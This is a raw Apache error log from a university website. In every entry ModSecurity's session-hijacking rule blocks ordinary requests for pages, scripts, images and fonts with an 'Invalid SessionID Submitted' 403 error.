[Mon Aug 28 07:17:01.963202 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvnfcCo-f0AAJLwX1MAAAAB"]
[Mon Aug 28 07:17:02.032237 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvnfsCo-f0AAJLyEYIAAAAH"]
[Mon Aug 28 07:17:02.089495 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvnfsCo-f0AAJN-mxwAAAAI"]
[Mon Aug 28 07:17:02.240336 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvnfsCo-f0AAJLwX1QAAAAB"]
[Mon Aug 28 07:17:02.375261 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvnfsCo-f0AAJIZSuEAAAAF"]
[Mon Aug 28 07:17:02.426899 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOvnfsCo-f0AAJN@72AAAAAE"]
[Mon Aug 28 07:17:02.431274 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/deny_haspada.jpg"] [unique_id "ZOvnfsCo-f0AAJNZd-EAAAAJ"]
[Mon Aug 28 07:17:02.457051 2023] [:error] [pid 37539] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Pas_Foto.jpg"] [unique_id "ZOvnfsCo-f0AAJKjZYYAAAAG"]
[Mon Aug 28 07:17:02.463205 2023] [:error] [pid 37313] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Msn-Buddy-web-icon.png"] [unique_id "ZOvnfsCo-f0AAJHB4@AAAAAD"]
[Mon Aug 28 07:17:02.515413 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/IMG_20160613_100811.jpg"] [unique_id "ZOvnfsCo-f0AAJN@72EAAAAE"]
[Mon Aug 28 07:28:43.691248 2023] [:error] [pid 37806] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvqO8Co-f0AAJOuUPAAAAAO"]
[Mon Aug 28 07:28:43.791112 2023] [:error] [pid 37619] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvqO8Co-f0AAJLzWmkAAAAC"]
[Mon Aug 28 07:28:43.791226 2023] [:error] [pid 37844] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvqO8Co-f0AAJPUAVQAAAAA"]
[Mon Aug 28 07:28:43.951234 2023] [:error] [pid 37803] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvqO8Co-f0AAJOr9f0AAAAL"]
[Mon Aug 28 07:28:44.482996 2023] [:error] [pid 37616] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvqPMCo-f0AAJLwYFEAAAAB"]
[Mon Aug 28 07:28:49.691348 2023] [:error] [pid 37619] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvqQcCo-f0AAJLzWmsAAAAC"]
[Mon Aug 28 07:28:54.272599 2023] [:error] [pid 37312] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvqRsCo-f0AAJHAlSoAAAAY"]
[Mon Aug 28 07:28:58.271735 2023] [:error] [pid 37808] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvqSsCo-f0AAJOwSWYAAAAH"]
[Mon Aug 28 07:29:18.471458 2023] [:error] [pid 37806] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvqXsCo-f0AAJOuUPYAAAAO"]
[Mon Aug 28 07:29:22.231394 2023] [:error] [pid 37312] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvqYsCo-f0AAJHAlTEAAAAY"]
[Mon Aug 28 07:30:23.655983 2023] [:error] [pid 37806] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvqn8Co-f0AAJOuUQkAAAAO"]
[Mon Aug 28 07:30:24.173662 2023] [:error] [pid 37803] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvqoMCo-f0AAJOr9hkAAAAL"]
[Mon Aug 28 07:31:54.407273 2023] [:error] [pid 37806] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvq@sCo-f0AAJOuUR4AAAAO"]
[Mon Aug 28 07:31:55.052189 2023] [:error] [pid 37758] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvq@8Co-f0AAJN@8MgAAAAE"]
[Mon Aug 28 07:31:55.493712 2023] [:error] [pid 37844] [client 66.249.70.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvq@8Co-f0AAJPUAYMAAAAA"]
[Mon Aug 28 07:40:27.891056 2023] [:error] [pid 37918] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvs@8Co-f0AAJQeRfAAAAAP"]
[Mon Aug 28 07:40:27.897537 2023] [:error] [pid 37758] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvs@8Co-f0AAJN@8RMAAAAE"]
[Mon Aug 28 07:40:27.899874 2023] [:error] [pid 37882] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvs@8Co-f0AAJP6BLMAAAAM"]
[Mon Aug 28 07:40:27.901633 2023] [:error] [pid 37313] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvs@8Co-f0AAJHB5Z4AAAAD"]
[Mon Aug 28 07:40:27.902856 2023] [:error] [pid 38020] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvs@8Co-f0AAJSENWUAAAAH"]
[Mon Aug 28 07:40:27.906075 2023] [:error] [pid 38021] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/pmb23.png"] [unique_id "ZOvs@8Co-f0AAJSFI3EAAAAI"]
[Mon Aug 28 07:40:27.910678 2023] [:error] [pid 37616] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/wisuda_juni_2023.png"] [unique_id "ZOvs@8Co-f0AAJLwYOoAAAAB"]
[Mon Aug 28 07:40:27.918919 2023] [:error] [pid 37313] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/rakerma_2023.png"] [unique_id "ZOvs@8Co-f0AAJHB5Z8AAAAD"]
[Mon Aug 28 07:40:27.921660 2023] [:error] [pid 37844] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff2"] [unique_id "ZOvs@8Co-f0AAJPUAesAAAAA"]
[Mon Aug 28 07:40:27.923595 2023] [:error] [pid 37758] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/hibah_2023.png"] [unique_id "ZOvs@8Co-f0AAJN@8RQAAAAE"]
[Mon Aug 28 07:40:27.925475 2023] [:error] [pid 37616] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOvs@8Co-f0AAJLwYOsAAAAB"]
[Mon Aug 28 07:40:27.927854 2023] [:error] [pid 37918] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/dirpasca_2023.png"] [unique_id "ZOvs@8Co-f0AAJQeRfEAAAAP"]
[Mon Aug 28 07:40:27.936790 2023] [:error] [pid 37882] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOvs@8Co-f0AAJP6BLQAAAAM"]
[Mon Aug 28 07:40:27.948883 2023] [:error] [pid 38021] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOvs@8Co-f0AAJSFI3IAAAAI"]
[Mon Aug 28 07:40:27.950862 2023] [:error] [pid 38020] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvs@8Co-f0AAJSENWYAAAAH"]
[Mon Aug 28 07:40:27.951600 2023] [:error] [pid 37313] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOvs@8Co-f0AAJHB5aAAAAAD"]
[Mon Aug 28 07:40:27.954977 2023] [:error] [pid 37844] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff"] [unique_id "ZOvs@8Co-f0AAJPUAewAAAAA"]
[Mon Aug 28 07:40:27.956892 2023] [:error] [pid 37758] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOvs@8Co-f0AAJN@8RUAAAAE"]
[Mon Aug 28 07:40:27.958354 2023] [:error] [pid 37918] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOvs@8Co-f0AAJQeRfIAAAAP"]
[Mon Aug 28 07:40:27.972867 2023] [:error] [pid 37616] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOvs@8Co-f0AAJLwYOwAAAAB"]
[Mon Aug 28 07:40:27.974858 2023] [:error] [pid 37882] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOvs@8Co-f0AAJP6BLUAAAAM"]
[Mon Aug 28 07:40:27.977659 2023] [:error] [pid 37313] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOvs@8Co-f0AAJHB5aEAAAAD"]
[Mon Aug 28 07:40:27.978621 2023] [:error] [pid 37918] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.ttf"] [unique_id "ZOvs@8Co-f0AAJQeRfMAAAAP"]
[Mon Aug 28 07:40:27.984960 2023] [:error] [pid 37844] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOvs@8Co-f0AAJPUAe0AAAAA"]
[Mon Aug 28 07:40:27.986915 2023] [:error] [pid 37758] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOvs@8Co-f0AAJN@8RYAAAAE"]
[Mon Aug 28 07:40:28.017115 2023] [:error] [pid 38021] [client 180.244.128.165] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvs-MCo-f0AAJSFI3MAAAAI"]
[Mon Aug 28 07:42:08.823145 2023] [:error] [pid 37882] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvtYMCo-f0AAJP6BMYAAAAM"]
[Mon Aug 28 07:42:08.824473 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvtYMCo-f0AAJOr9qAAAAAL"]
[Mon Aug 28 07:42:08.824472 2023] [:error] [pid 37844] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvtYMCo-f0AAJPUAgEAAAAA"]
[Mon Aug 28 07:42:08.824510 2023] [:error] [pid 37916] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvtYMCo-f0AAJQcJ0EAAAAF"]
[Mon Aug 28 07:42:08.937657 2023] [:error] [pid 37616] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvtYMCo-f0AAJLwYP4AAAAB"]
[Mon Aug 28 07:42:09.104210 2023] [:error] [pid 38020] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvtYcCo-f0AAJSENXkAAAAH"]
[Mon Aug 28 07:42:09.450761 2023] [:error] [pid 37917] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvtYcCo-f0AAJQdMRwAAAAJ"]
[Mon Aug 28 07:44:38.483400 2023] [:error] [pid 38020] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOvt9sCo-f0AAJSENYwAAAAH"]
[Mon Aug 28 07:44:38.484036 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOvt9sCo-f0AAJOr9sIAAAAL"]
[Mon Aug 28 07:44:38.646933 2023] [:error] [pid 37916] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOvt9sCo-f0AAJQcJ1YAAAAF"]
[Mon Aug 28 07:44:38.647138 2023] [:error] [pid 37616] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOvt9sCo-f0AAJLwYR4AAAAB"]
